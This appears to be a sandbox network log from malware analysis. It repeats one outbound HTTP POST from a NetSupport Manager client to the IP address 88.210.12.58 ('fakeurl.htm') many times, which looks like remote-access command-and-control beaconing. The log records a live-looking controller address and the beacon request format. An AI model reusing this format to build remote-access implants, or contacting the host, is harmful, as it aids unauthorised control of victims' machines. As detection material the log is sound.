Dec 10, 2024 08:59:23.514103889 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.615025997 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.715013981 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.816734076 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.916013002 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.017034054 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.117017031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.218054056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.319061041 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.420058012 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.521079063 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.621054888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.722049952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.822015047 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:24.924751043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.024863005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.124744892 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.223017931 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.324018955 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.424014091 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.524000883 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.625077009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.728746891 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.828747988 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:25.927056074 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.028055906 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.128048897 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.229044914 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.330019951 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.430058956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.531055927 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.632097006 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.732032061 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.832021952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:26.934875011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.036757946 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.134020090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.235013008 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.336735964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.436734915 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.536736012 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.636014938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.736736059 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.836740971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:27.937113047 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.038103104 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.139070034 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.240051031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.340049028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.441070080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.542071104 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.643018961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.743036032 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.844019890 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:28.944741964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.045053959 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.148749113 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.246046066 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.348742962 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.448744059 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.549122095 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.649060965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.749078989 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.850039959 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:29.951040983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.051040888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.152045965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.252065897 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.353038073 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.453079939 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.554090977 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.655049086 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.755023956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.855031013 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:30.956779957 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.056061029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.156033993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.257051945 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.358021975 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.458071947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.559143066 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.660197973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.760040998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.861047983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:31.962061882 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.062163115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.162039995 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.263077021 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.364137888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.464051962 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.565087080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.666069031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.767019987 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
